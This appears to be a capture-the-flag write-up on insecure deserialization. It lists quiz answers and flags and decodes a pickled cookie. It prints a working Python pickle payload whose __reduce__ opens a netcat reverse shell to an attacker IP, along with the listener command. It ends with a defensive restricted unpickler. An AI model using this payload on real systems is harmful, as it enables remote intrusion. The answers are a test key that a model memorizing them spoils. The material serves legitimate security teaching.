Task 21~26
Insecure Deserialization
Who developed the Tomcat application?
Answer
The Apache Software Foundation
What type of attack that crashes services can be performed with insecure deserialization?
Answer
denial of service
Insecure Deserialization - Objects
Select the correct term of the following statement:
Answer
A Behaviour
Insecure Deserialization - Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
Answer
binary
Insecure Deserialization - Cookies
If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
Answer
webapp.com/login
What is the acronym for the web technology that Secure cookies work over?
Answer
https
Insecure Deserialization - Cookies Practical
1st flag (cookie value)

Decode the base64 cookie value:

```shell
echo -n "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAZDYzOWIzNzUwMjM5NDM3ZTk4ZGZmOWM3NjEwOTYxZjlxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==" | base64 --decode
```

The decoded bytes are a pickled Python dict (protocol 3); the printable parts of the output read:

```
}q(X sessionIdqX d639b3750239437e98dff9c7610961f9qX encodedflagqXTHM{good_old_base64_huh}qu.
```

Answer
qXTHM{good_old_base64_huh}
2nd flag (admin dashboard)
Change user to admin

Answer
THM{heres_the_admin_flag}
Insecure Deserialization - Code Execution
On the local machine, run an nc listener:

```shell
nc -lvnp 4444
```

Edit the Python script with your VPN IP:

```python
import pickle
import base64

# Reverse shell command; replace the IP with your own VPN address
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 10.18.1.159 4444 > /tmp/f'

class rce(object):
    # pickle calls __reduce__ when serialising; the (callable, args) pair it
    # returns is what runs on the target when the payload is deserialised
    def __reduce__(self):
        import os
        return (os.system, (command,))

# Serialise the object and base64-encode it so it can be used as the cookie value
print(base64.b64encode(pickle.dumps(rce())).decode())
```

Run the Python script and get the base64 command:

```
gASVdAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFlybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTguMS4xNTkgNDQ0NCA+IC90bXAvZpSFlFKULg==
```

Edit the encodedPayload with this value and get remote access, then read the flag:

```shell
cat /home/cmnatic/flag.txt
```

Answer
4a69a7ff9fd68
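The cookie becomes code execution because pickle resolves whatever global the payload's __reduce__ names. The following is an added example, not code from the room or this writeup: a restricted unpickler that still loads the plain sessionId/encodedflag dict but aborts on any __reduce__ gadget. The gadget and the cookie values are constructed stand-ins (the gadget names os.getcwd instead of the room's os.system, so the unsafe path only returns a directory).

```python
import base64
import io
import os
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global (module.attribute) reference while loading.
    A plain dict like {"sessionId": ..., "encodedflag": ...} is rebuilt from
    opcodes alone and never calls find_class, so it still loads. A __reduce__
    gadget must name its callable (the room's payload names os.system), so
    find_class fires and the load aborts before anything executes.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing global {module}.{name}")

def encode_cookie(obj) -> str:
    """pickle then base64, the same layout the challenge cookie uses."""
    return base64.b64encode(pickle.dumps(obj)).decode()

def load_cookie_restricted(cookie: str):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie))).load()

class BenignGadget:
    """Stand-in for the room's rce class: its __reduce__ names os.getcwd rather
    than os.system, so plain pickle.loads only returns a path, not a shell."""

    def __reduce__(self):
        return (os.getcwd, ())

# Constructed sample values (not the room's real session id or flag).
SAMPLE_COOKIE = encode_cookie({"sessionId": "c0ffee00", "encodedflag": "THM{constructed_sample}"})
GADGET_COOKIE = encode_cookie(BenignGadget())

def gadget_runs_under_plain_loads(cookie: str) -> bool:
    """True if pickle.loads executed the gadget (its result equals os.getcwd())."""
    return pickle.loads(base64.b64decode(cookie)) == os.getcwd()

def gadget_rejected(cookie: str) -> bool:
    """True if the restricted unpickler aborted on a global reference."""
    try:
        load_cookie_restricted(cookie)
    except pickle.UnpicklingError:
        return True
    return False

if __name__ == "__main__":
    print(gadget_runs_under_plain_loads(GADGET_COOKIE), gadget_rejected(GADGET_COOKIE))
    print(load_cookie_restricted(SAMPLE_COOKIE))
```

Forbidding globals outright is the simplest safe policy for a session cookie; signing the cookie (or using JSON instead of pickle) removes the deserialization sink entirely.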